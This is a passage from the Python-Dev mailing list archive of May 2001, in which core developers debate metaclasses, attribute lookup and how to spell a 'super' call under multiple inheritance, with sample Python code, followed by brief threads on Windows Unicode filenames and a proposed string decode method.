should implement > this mechanism in the meta-class (TypeType in this case). Its > __getattr__() will have to decide whether or not to expose its > own methods and attributes or not. That's exactly how I solved it: type_getattro() implements the rule quoted at the top. > The only catch here is that currently instances and classes have > control of whether and how to bind found functions as methods or not. > We should probably change that to pass complete control over to the > meta-class object and remove the special control flows currently found > in instance_getattr2() and class_lookup(). Um, yeah, that's where I think this will end up causing more trouble. Right now, if x is an instance, some attributes like x.__class__ and x.__dict__ special-cased in instance_getattr(). The mechanism I propose removes the need for (most of) such special cases, and instead allows the class to provide "descriptors" for instance attributes. So, for example, if instances of a class C have an attribute named foo, C.__dict__['foo'] contains the descriptor for that attribute, and that is how the implementation decides how to interpret x.foo (assuming x is an instance of C). We may be able to access this same descriptor as C.foo, but that's really only important for backwards compatibility with the way classes work today. > In general, I think that meta-classes should not expose their > attributes to the class objects they create, since this causes > way to many problems. I agree. > Perhaps I'm oversimplifying things here, but I have a feeling that > we can go a long way by actually trying to see meta-classes as > first class members in the interpreter design and moving all the > binding and lookup mechanisms over to this object type. The special > casing should then take place in the meta-class rather than its > creations. Yes, that's where I'm heading! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:02:41 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:02:41 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF01381.592AE31B@lemburg.com> Guido van Rossum wrote: > > > This doesn't work in Python since Python has multiple inheritence, > > e.g. super in > > > > class A(B,C): > > def foo(self): > > super.foo() > > > > is ambiguous. > > I'm not sure what you mean. The search is totally well-defined: first > search B for a foo method, then search C. I thought you were talking about an abstract super class which is how Java uses this term. Rereading some of the posts, I think you are indeed referring to the method which foo overrides -- this is what I call basemethod (since it is implemented in one of the base classes). > > I'd rather suggest adding a function for finding the basemethod > > of a method. This is probably the most common task in this context. > > I've never heard of the concept of basemethod, but if I may venture a > guess, it would be the same definition as I give above. The basemethod can be defined as the first method of the same name found in the inheritence tree using the standard Python lookup strategy (left-right, depth first) when continuing the lookup search at the node in the inheritence tree which defines the method querying the basemethod. In other words: you let Python continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API. Hmm, still not clear enough... better let Tim jump in here (we've had a discussion about basemethod() some months or years ago). Tim ? Note that there are many ways of defining what a basemethod is, due to the ambiguities that are caused by multiple inheritence (e.g. the same base class may appear in different branches of the inheritence tree). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 17:05:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:05:30 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200." <000d01c0d310$4ee127d0$0900a8c0@spiff> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com> > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) > > > Or, to relieve the burden from the symbol table, we could make super > > a keyword, at the cost of breaking existing code. > > hey, how about introducing $ as a keyword prefix for newly introduced > keywords? > > $super.foo(arg1, arg2) > > (this can of course be mapped to either of my previous suggestions; > "$foo" either means "self.foo" or "foo(self)"...) > > and to save a little typing, only use it for keywords that start with > an "s" (should leave us plenty of expansion room): > > $uper.foo(arg1, arg2) > > otoh, if "super" is common enough to motivate introducing magic objects > into python, maybe "$" should mean "super."? > > $foo(arg1, arg2) > > and while we're at it, let's introduce "@" for "self.". > > gotta run -- time for my monthly reboot /F LOL! But you forgot the spelling of self.__super.foo(arg1, arg2) which would pass in the class name that's the other necessary input to a proper implementation of super. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:04:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:04:29 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF013ED.8A190FE2@lemburg.com> Here's an implementation of what I currently use to track down the basemethod (taken from mx.Tools): import types _basemethod_cache = {} def basemethod(object,method=None, cache=_basemethod_cache,InstanceType=types.InstanceType, ClassType=types.ClassType,None=None): """ Return the unbound method that is defined *after* method in the inheritance order of object with the same name as method (usually called base method or overridden method). object can be an instance, class or bound method. method, if given, may be a bound or unbound method. If it is not given, object must be bound method. Note: Unbound methods must be called with an instance as first argument. The function uses a cache to speed up processing. Changes done to the class structure after the first hit will not be noticed by the function. XXX Rewrite in C to increase performance. """ if method is None: method = object object = method.im_self defclass = method.im_class name = method.__name__ if type(object) is InstanceType: objclass = object.__class__ elif type(object) is ClassType: objclass = object else: objclass = object.im_class # Check cache cacheentry = (defclass, name) basemethod = cache.get(cacheentry, None) if basemethod is not None: if not issubclass(objclass, basemethod.im_class): if __debug__: sys.stderr.write( 'basemethod(%s, %s): cached version (%s) mismatch: ' '%s !-> %s\n' % (object, method, basemethod, objclass, basemethod.im_class)) else: return basemethod # Find defining class path = [objclass] while 1: if not path: raise AttributeError,method c = path[0] del path[0] if c.__bases__: # Prepend bases of the class path[0:0] = list(c.__bases__) if c is defclass: # Found (first occurance of) defining class in inheritance # graph break # Scan rest of path for the next occurance of a method with the # same name while 1: if not path: raise AttributeError,name c = path[0] basemethod = getattr(c, name, None) if basemethod is not None: # Found; store in cache and return cache[cacheentry] = basemethod return basemethod del path[0] raise AttributeError,'method %s' % name -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 16:06:39 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:06:39 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> /F: > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) IMO we still need to specify the class, and there we are: super(self, MyClass).foo(arg1, arg2) Thomas From guido at digicool.com Wed May 2 17:11:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:11:17 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200." <3AF01381.592AE31B@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > > > > This doesn't work in Python since Python has multiple inheritence, > > > e.g. super in > > > > > > class A(B,C): > > > def foo(self): > > > super.foo() > > > > > > is ambiguous. > > > > I'm not sure what you mean. The search is totally well-defined: first > > search B for a foo method, then search C. > > I thought you were talking about an abstract super class which is > how Java uses this term. Ah. I didn't realize. This would suggest that another (not yet mentioned) suggestion would be to spell the basemethod call as super.foo(self) keeping more in line with the tradition of passing self explicitly when calling basemethods. > Rereading some of the posts, I think you are indeed referring to > the method which foo overrides -- this is what I call basemethod > (since it is implemented in one of the base classes). Aha. > > > I'd rather suggest adding a function for finding the basemethod > > > of a method. This is probably the most common task in this context. > > > > I've never heard of the concept of basemethod, but if I may venture a > > guess, it would be the same definition as I give above. > > The basemethod can be defined as the first method of the same name > found in the inheritence tree using the standard Python lookup > strategy (left-right, depth first) when continuing the lookup search > at the node in the inheritence tree which defines the method querying > the basemethod. Yes, that's what I guessed. > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the basemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? > > Note that there are many ways of defining what a basemethod > is, due to the ambiguities that are caused by multiple inheritence > (e.g. the same base class may appear in different branches of the > inheritence tree). Well, the search will find one definite method, but you're right that there may be situations where it's necessary to specify the specific base class! In C++ that is solved by writing B::foo() or C::foo(). Python doesn't have "::" and instead overloads the "." operator. Hmm, so even introducing super doesn't completely remove the need to be able to write C.foo to reference the unbound method foo of class C, and this may require that my ugly rule still be needed. AFAIK, Smalltalk has only single inheritance, and so does Java, so there 'super' is enough. Will we need to add a "::" operator to Python??? --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:19:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:19:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200." <3AF013ED.8A190FE2@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com> > Here's an implementation of what I currently use to track down > the basemethod (taken from mx.Tools): How am I supposed to use this? I tried this: class B: def foo(self): print "B.foo" class C(B): def foo(self): print "C.foo" B.foo(self) print basemethod(self.foo) # Expect this to be B.foo class D(C): def foo(self): print "D.foo" C.foo(self) d = D() d.foo() but the call to basemethod(self.foo) in C prints C.foo, not B.foo as required. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:23:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:23:33 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> > > Except that sometimes you really do want x.__class__.__classdict__ to > > have priority (e.g. for "guarded" attributes). > > What's a "guarded" attribute? I meant an attribute that's implemented by a pair of get and set functions. This is very useful; my proposed design lets you define this more directly rather than requiring you to override __getattr__ and __setattr__. > > But the issue of backwards compatibility is a big one here > > I was thinking that, while this is still in the __future__, > the __dict__ attribute would be a pseudo-dict that, by > default, behaves like the union of the old __dict__ and > the __classdict__. Actually, I think that what's in the __dict__ is just perfect; it's the definition of getattr(classobject, name) where name is both an instance and a class method that causes trouble. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:29:20 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:29:20 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com> Message-ID: <3AF019C0.716E6D35@lemburg.com> Guido van Rossum wrote: > > > Here's an implementation of what I currently use to track down > > the basemethod (taken from mx.Tools): > > How am I supposed to use this? > > I tried this: > > class B: > def foo(self): > print "B.foo" > > class C(B): > def foo(self): > print "C.foo" > B.foo(self) > print basemethod(self.foo) # Expect this to be B.foo This finds the basemethod of self.foo meaning the method overridden by D.foo. To get at the basemethod of C.foo, you'd have to call basemethod(self, C.foo) Note that the intent here is to be able to call basemethods even in case the defining class is only mixin class -- a very common situation at least in many of my applications (keeps inheritance trees shallow and increases readability of the code). > class D(C): > def foo(self): > print "D.foo" > C.foo(self) > > d = D() > d.foo() > > but the call to basemethod(self.foo) in C prints C.foo, not B.foo as > required. > > --Guido van Rossum (home page: http://www.python.org/~guido/) > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > http://mail.python.org/mailman/listinfo/python-dev -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Wed May 2 16:15:58 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 16:15:58 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid> thomas wrote: > > why not spell it out: > > > > self.__super__.foo(arg1, arg2) > > > > or > > > > self.super.foo(arg1, arg2) > > > > or > > > > super(self).foo(arg1, arg2) > > IMO we still need to specify the class, and there we are: > > super(self, MyClass).foo(arg1, arg2) isn't that the same as self.__class__ ? in which case super is something like: import new class super: def __init__(self, instance): self.instance = instance def __getattr__(self, name): for klass in self.instance.__class__.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) (I'm even more confused than my pythonware.com colleague) Cheers /F From donb at abinitio.com Wed May 2 16:41:14 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 10:41:14 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <200105021441.KAA08444@localhost.localdomain> Guido van Rossum wrote, > [Greg Ward, welcome back!] > > * 'super' is a magic object that only makes sense inside a 'def' > > inside a 'class' (at least for now; perhaps it could be generalized > > to work at class scope as well as method scope, but let's keep > > it simple) > > Yes, that's about the only way it can be made to work. The compiler > will have to (1) detect that 'super' is a free variable, and (2) make > it a local and initialize it with the proper magic. Or, to relieve > the burden from the symbol table, we could make super a keyword, at > the cost of breaking existing code. I'm not at all sure I like the idea of 'super'. It's far more magic that I am used to (coming from Python at least). Currently, we spell 'super' like this: class foo(bar): def __repr__(self): return bar.__repr__(self) # that's super! I like the explicit nature of it. As Guido points out however, this ends up being ambiguous when we try to make classes more "instance-like". Now, how do I like to spell super? class foo(bar): def __repr__(self): return bar._.__repr__(self) # now that's really super! or, for those who like the "keyword": class foo(bar): def __repr__(self): super = bar._ return super.__repr__(self) The trick here in the implementation of getattr on the '_'. It return a proxy object for the class. When attributes are accessed through it a different search path is taken. This path is the same path that would be taken by instance attribute look up. In my code, I refer to this object as the 'unbound instance'. Since accessing a function through this object will yield an unbound instance method, the name makes sense to me. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From thomas.heller at ion-tof.com Wed May 2 16:49:02 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:49:02 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook> > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: > > import new > > class super: > def __init__(self, instance): > self.instance = instance > def __getattr__(self, name): > for klass in self.instance.__class__.__bases__: > member = getattr(klass, name, None) > if member: > if callable(member): > return new.instancemethod(member, self.instance, klass) > return member > raise AttributeError(name) > No, it's not the same. Consider: class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self).test() class Z(Y): pass X().test() print Y().test() print Z().test() print This prints: test X test Y test X test Y test Y (more test Y lines deleted) Runtime error: maximum recursion depth exceeded This is because super(self).test for the Z() object should start the search in the X class, not in the Y class. Thomas From thomas.heller at ion-tof.com Wed May 2 16:53:17 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:53:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook> This implementation of super works correctly: import new class super: def __init__(self, instance, klass): self.instance = instance self.klass = klass def __getattr__(self, name): for klass in (self.klass,) + self.klass.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self, X).test() class Z(Y): pass X().test() print Y().test() print Z().test() print Thomas From donb at abinitio.com Wed May 2 17:31:45 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:31:45 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105021531.LAA08940@localhost.localdomain> Guido van Rossum wrote, > AFAIK, Smalltalk has only single inheritance, and so does Java, so > there 'super' is enough. Will we need to add a "::" operator to > Python??? Multiple inheritance introduces a potential wrinkle in my definition of the unbound instance. The problem is that search starts one level too high. That is in: class foo(b1, b2): def __repr__(self): super = b1._ #this one super = b2._ #or this one? return super.__repr__(self) we dont know which base class to choose as the starting point for the search. This problem already exist. Now, if we want to avoid it, this: class foo(b1, b2): def __repr__(self): super = foo.__super__ return super.__repr__(self) comes to mind. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...Will hack for sushi... From donb at abinitio.com Wed May 2 17:37:39 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:37:39 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <200105021537.LAA09063@localhost.localdomain> "Fredrik Lundh" wrote, > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: super is a lexically scoped concept. You cant ask the instance for it since it's value is different depending on in which it is needed Just as: class foo(bar): def __repr__(self): return self.__class__.__repr__(self) would get you into an infinite loop, while: class foo(bar): def __repr__(self): return bar.__repr__(self) wont. Now, dont go thinking that class foo(bar): def __repr__(self): return self.__class__.__base__[0].__repr__(self) will do you any good either ;) Because it wont! -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Wed May 2 19:02:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:02:19 -0500 Subject: [Python-Dev] Unicode and the Windows file system. In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000." References: Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> > Now that 2.1 is out the door, how do we feel about getting these Unicode > changes in? > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 No problem for me, although the context-sensitive semantics of the MBCS encoding still elude me. (Who cares, it's Windows. :-) Are you & MAL capable of sorting this out? Do you want me to add a +1 comment to the tracker? --Guido van Rossum (home page: http://www.python.org/~guido/) From gmcm at hypernet.com Wed May 2 18:01:20 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Wed, 2 May 2001 12:01:20 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> References: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <3AEFF710.9471.8025D7EA@localhost> Hmmm. Some time ago, Tim asked the question: "Why do you wnat this stuff?". As far as I can recall, he got 2 answers: "So I don't have to 'initialize(Klass)'" and "me, too". I don't think those qualify as answers. Some time ago (cf, types-sig brouhaha of a couple years ago) I concluded that the only purpose for this stuff was __getattr__ and __setattr__ hacks. I reached this conclusion by going nutzo using (Guido's) metaclass hook, and studying the available uses of ExtensionClass (I could find no public usage of Don's elegant madness). I rather liked Guido's "Turtles all the way down" (but his description was so cryptic that my interpretation may have been a hallucination), and I suspect he's still headed that way. Nonetheless, I would like to see this discussion of the elegance of SmallTalk's incompatible model (and how to fudge it in Python) balanced by some discussion of the expected pragmatic benefits. (That's a different topic from subclassing types.) start-with-"if-God-wanted-metaclasses-he-wouldn't-have- invented-proxies"--ly y'rs - Gordon From fredrik at effbot.org Wed May 2 17:47:08 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 17:47:08 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid> Donald Beaudry wrote: > super is a lexically scoped concept. You cant ask the instance for it > since it's value is different depending on in which it is needed oh, you want people to be able to inherit from classes using super? guess we'll have to use sys._getframe().f_back.f_method.im_class instead, then ;-) (any special reason why frame objects don't contain a pointer to the corresponding function/method object?) Cheers /F From mal at lemburg.com Wed May 2 18:11:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 18:11:50 +0200 Subject: [Python-Dev] Unicode and the Windows file system. References: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> Message-ID: <3AF031C6.324D25D5@lemburg.com> Guido van Rossum wrote: > > > Now that 2.1 is out the door, how do we feel about getting these Unicode > > changes in? > > > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 > > No problem for me, although the context-sensitive semantics of the > MBCS encoding still elude me. (Who cares, it's Windows. :-) > > Are you & MAL capable of sorting this out? Do you want me to add a +1 > comment to the tracker? I'll take care of the parser marker stuff and Mark can do the rest ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 19:17:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:17:50 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200." <00a901c0d31f$2797a370$e46940d5@hagrid> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> <00a901c0d31f$2797a370$e46940d5@hagrid> Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com> > (any special reason why frame objects don't contain a > pointer to the corresponding function/method object?) Because (until now) there was no need. The frame needs to know about the code object, but the rest of the function's context is not needed. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:13:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:13:17 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! Message-ID: <3AF04E3D.45AE4F4B@lemburg.com> We already have "data".encode(encoding) which encodes the string data by passing it through the encoder of the given encoding. Wouldn't it be worthwhile to add direct access to codec decoders through string methods as well ? (Note that this addition only makes sense for string objects, since Unicode cannot be decoded.) Also, would there be any objections adding some more standard codecs to the system ? I'm thinking of wrapping the binascii module APIs in form of codecs... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:18:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:18:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200." <3AF04E3D.45AE4F4B@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com> > We already have "data".encode(encoding) which encodes the string data > by passing it through the encoder of the given encoding. > > Wouldn't it be worthwhile to add direct access to codec decoders > through string methods as well ? > > (Note that this addition only makes sense for string objects, > since Unicode cannot be decoded.) > > Also, would there be any objections adding some more standard > codecs to the system ? I'm thinking of 